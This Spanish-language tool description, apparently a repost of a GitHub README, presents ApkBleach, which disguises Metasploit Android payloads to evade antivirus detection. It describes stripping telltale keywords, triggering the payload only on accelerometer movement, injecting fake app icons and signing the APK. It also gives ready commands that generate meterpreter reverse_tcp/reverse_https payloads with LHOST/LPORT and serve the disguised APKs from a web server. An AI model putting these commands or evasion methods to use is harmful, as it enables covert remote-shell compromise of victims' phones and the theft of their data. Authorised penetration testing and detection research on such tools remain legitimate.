ApkBleach fue desarrollado específicamente para ofuscar las cargas útiles (payloads) de Android generadas por el framework metasploit en un intento de evadir la detección.
La ofuscación que se lleva a cabo intenta evadir la detección con dos métodos principales. El primer método es estrictamente para la detección de la carga útil descompilada. Por defecto, metasploit genera una aplicación Android llena de las palabras clave metasploit y payload. Reemplazar esas palabras clave con cadenas aleatorias y aleatorizar los nombres de los archivos es un buen primer paso para ofuscar la típica carga útil de metasploit android. El siguiente método es cambiar la forma en que se ejecuta el payload. El payload por defecto generado por metasploit se ejecuta al crear o simplemente al abrir la aplicación. Este método de ofuscación utiliza la actividad del acelerómetro del dispositivo para lanzar el payload. Así que el payload de metasploit esperará al movimiento físico del dispositivo de destino antes de ejecutar el payload.
Este software también automatiza el proceso de cambiar el icono de la app, cambiar el nombre de la app, firmar el .apk, alinear el .apk e instalar o actualizar apktool.
Para más información, puede ver el seminario web (utilizando Webinarcare) sobre ofuscación de cargas útiles.
Nueva función de la interfaz de usuario de despliegue:
Características
- Interfaz de usuario para el despliegue de cargas útiles
- Edición de permisos línea por línea. El software revisará cada permiso del archivo manifest y te preguntará si deseas eliminarlo.
- Opción de sigilo. Esto ejecuta la carga útil fuera del acelerómetro de los dispositivos en lugar de en abierto. Esta opción también te permite elegir cuántas sesiones quieres que se generen del exploit.
- Inyección de iconos personalizados. Esto permite a los usuarios modificar el icono de la aplicación que aparece en la pantalla de inicio de un dispositivo Android. Puedes elegir de un icono apkbleach proporcionado o puedes suministrar el tuyo propio. Apkbleach hará todo el trabajo por ti.
- Cambia el nombre de la aplicación por el nombre que hayas elegido como archivo de salida.
- Borra toda la aplicación de cualquier mención del nombre “metasploit” , “stage” o “payload“. Hay muchos por cierto. enviar pruebas de seguridad con una aplicación que contiene el nombre metasploit es simplemente gracioso 🙂
- Añade padnops (?) a PAYLOAD
- Firma el apk con jarsigner. msfenom produce aplicaciones sin firmar
- Alinea el apk en zip
- Función de actualización de Apktool. Si el software detecta que estás usando la versión 2.4.1-dirty de apktool, que es la versión de los mantenedores de paquetes de Kali, te preguntará si quieres reemplazarla con la última versión de ibot peaches. Esto es una buena idea porque entra en conflicto con la opción msfvenom -x y arroja un error de número de versión. Por no hablar de los problemas que ha dado a los usuarios en el pasado.
Uso
Tienes los siguientes comandos a disposición:
apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk
apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all
apkbleach --list-payloads
apkbleach --list-icons
apkbleach --clear-cache
Argumentos opcionales:
-h, --help show this help message and exit
-g [PAYLOAD] [LHOST] [LPORT]
Generates a payload
-s [number of sessions to spawn 1-5]
Executes payload on accelerometer activity instead of on open
-i [BLEACH_icon..] or [path/to/custom/icon]
Injects an icon
-o [output/path/for/file.apk]
Path to output apk
--edit-permissions Enables permission editing in apk's manifest
--deploy-all Deploys each available icon as a payload with the apache2 server with a web interface
--list-payloads List available icons
--list-icons List available icons
--clear-cache Allows prompt whether to keep package maintainers version apktool
Instalación
Después de clonar o descargar el repositorio, entra en el directorio apkbleach y ejecuta install.sh:
git clone https://github.com/graylagx2/ApkBleach.git
cd apkbleach
bash install.sh
o,
cd apkbleach
chmod +x install.sh
./install.sh
Vídeo Demostración
ApkBleach (este enlace se abre en una nueva ventana) por graylagx2 (este enlace se abre en una nueva ventana)
Android Payload obfuscation and icon injection tool